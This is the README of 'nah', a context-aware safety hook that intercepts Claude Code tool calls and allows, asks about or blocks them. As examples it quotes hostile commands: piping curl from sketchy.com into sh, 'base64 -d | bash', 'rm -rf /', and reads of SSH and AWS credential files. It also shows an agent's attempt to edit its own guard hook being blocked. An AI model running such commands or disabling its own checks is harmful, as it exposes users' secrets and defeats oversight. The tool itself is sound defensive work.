Context aware safety guard for Claude Code.
Because allow and deny isn't enough.
Docs • Install • What it guards • How it works • Configure • CLI
Claude Code’s permission system is allow-or-deny per tool, but that doesn’t really scale. Deleting some files is fine sometimes. And git checkout is sometimes catastrophic. Even when you curate permissions, 200 IQ Opus can find a way around it. Maintaining a deny list is a fool’s errand.
We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.
nah classifies every tool call by what it actually does using contextual rules that run in milliseconds. For the ambiguous stuff, optionally route to an LLM. Every decision is logged and inspectable. Works out of the box, configure it how you want it.
git push — Sure.
git push --force — nah?
rm -rf __pycache__ — Ok, cleaning up.
rm ~/.bashrc — nah.
Read ./src/app.py — Go ahead.
Read ~/.ssh/id_rsa — nah.
Write ./config.yaml — Fine.
Write ~/.bashrc with curl sketchy.com | sh — nah.
pip install nah
nah claude # try it — hooks active for this session onlyFor permanent use:
nah install # hooks in ~/.claude/settings.json, every sessionnah claude passes hooks inline via --settings, scoped to that process. nah install writes to settings.json so every claude session runs through nah. Undo with nah uninstall.
Don't use --dangerously-skip-permissions — just run claude in default mode. In --dangerously-skip-permissions mode, hooks fire asynchronously and commands execute before nah can block them.
By default nah actively allows safe operations for all guarded tools. To keep nah's protection on some tools but let others fall back to Claude Code's built-in prompts, set active_allow to a list:
# ~/.config/nah/config.yaml
# Only actively allow these tools (Write/Edit fall back to Claude Code's prompts)
active_allow: [Bash, Read, Glob, Grep]
# Or disable active allow entirely
active_allow: falseValid tool names: Bash, Read, Write, Edit, Glob, Grep. See configuration docs.
To uninstall: nah uninstall && pip uninstall nah.
Clone the repo and run the security demo inside Claude Code:
git clone https://github.com/manuelschipper/nah.git
cd nah
# inside Claude Code:
/nah-demo25 live cases across 8 threat categories: remote code execution, data exfiltration, obfuscated commands, and others. Takes ~5 minutes.
nah is a PreToolUse hook that intercepts every tool call before it executes:
| Tool | What nah checks |
|---|---|
| Bash | Structural command classification — action type, pipe composition, shell unwrapping |
| Read | Sensitive path detection (~/.ssh, ~/.aws, .env, ...) |
| Write | Path check + project boundary + content inspection (secrets, exfiltration, destructive payloads) |
| Edit | Path check + project boundary + content inspection on the replacement string |
| Glob | Guards directory scanning of sensitive locations |
| Grep | Catches credential search patterns outside the project |
| MCP tools | Generic classification for third-party tool servers (mcp__*) |
Every tool call hits a deterministic structural classifier first, no LLMs involved.
Claude: Edit → ~/.claude/hooks/nah_guard.py
nah. Edit targets hook directory: ~/.claude/hooks/ (self-modification blocked)
Claude: Read → ~/.aws/credentials
nah? Read targets sensitive path: ~/.aws (requires confirmation)
Claude: Bash → npm test
✓ allowed (package_run)
Claude: Write → config.py containing "-----BEGIN PRIVATE KEY-----"
nah? Write content inspection [secret]: private key
nah. = blocked. nah? = asks for your confirmation. Everything else goes through.
The same command gets different decisions based on context:
| Command | Context | Decision |
|---|---|---|
rm dist/bundle.js |
Inside project | Allow |
rm ~/.bashrc |
Outside project | Ask |
git push --force |
History rewrite | Ask |
base64 -d | bash |
Decode + exec pipe | Block |
For commands the classifier can't resolve, nah can optionally consult an LLM:
Tool call → nah (deterministic) → LLM (optional) → Claude Code permissions → execute
The deterministic layer always runs first — the LLM only resolves leftover "ask" decisions. If no LLM is configured or available, the decision stays "ask" and the user is prompted.
Supported providers: Ollama, OpenRouter, OpenAI, Anthropic, Snowflake Cortex.
Works out of the box with zero config. When you want to tune it:
# ~/.config/nah/config.yaml (global)
# .nah.yaml (per-project, can only tighten)
# Override default policies for action types
actions:
filesystem_delete: ask # always confirm deletes
git_history_rewrite: block # never allow force push
lang_exec: allow # trust inline scripts
# Guard sensitive directories
sensitive_paths:
~/.kube: ask
~/Documents/taxes: block
# Teach nah about your custom commands
classify:
filesystem_delete:
- cleanup-staging
db_write:
- migrate-prodnah classifies commands by action type, not by command name. Run nah types to see all 23 built-in action types with their default policies.
Every command maps to an action type, and every action type has a default policy:
| Policy | Meaning | Example types |
|---|---|---|
allow |
Always permit | filesystem_read, git_safe, package_run |
context |
Check path/project context, then decide | filesystem_write, filesystem_delete, network_outbound, lang_exec |
ask |
Always prompt the user | git_history_rewrite, git_remote_write, process_signal |
block |
Always reject | obfuscated |
Choose how much built-in classification to start with:
# ~/.config/nah/config.yaml
profile: full # full | minimal | none- full (default) — comprehensive coverage across shell, git, packages, containers, and more
- minimal — curated essentials only (rm, git, curl, kill, ...)
- none — blank slate — make your own
# ~/.config/nah/config.yaml
llm:
enabled: true
max_decision: ask # cap: LLM can't escalate past "ask"
providers: [openrouter] # cascade order
openrouter:
url: https://openrouter.ai/api/v1/chat/completions
key_env: OPENROUTER_API_KEY
model: google/gemini-3.1-flash-lite-previewProject .nah.yaml can add classifications and tighten policies, but can never relax them. A malicious repo can't use .nah.yaml to allowlist dangerous commands — only your global config has that power.
nah install # install hook
nah uninstall # clean removal
nah update # update hook after pip upgrade
nah config show # show effective merged config
nah config path # show config file locationsnah test "rm -rf /" # dry-run Bash classification
nah test --tool Read ~/.ssh/id_rsa # test any tool, not just Bash
nah test --tool Write ./out.txt # test Write with content inspection
nah types # list all action types with default policies
nah log # show recent hook decisions
nah log --blocks # show only blocked decisions
nah log --asks # show only ask decisions
nah log --tool Bash -n 20 # filter by tool, limit entries
nah log --json # machine-readable output
/nah-demo # live security demo inside Claude CodeAdjust policies from the command line:
nah allow filesystem_delete # allow an action type
nah deny network_outbound # block an action type
nah classify "docker rm" container_destructive # teach nah a command
nah trust api.example.com # trust a network host
nah allow-path ~/sensitive/dir # exempt a path for this project
nah status # show all custom rules
nah forget filesystem_delete # remove a rule
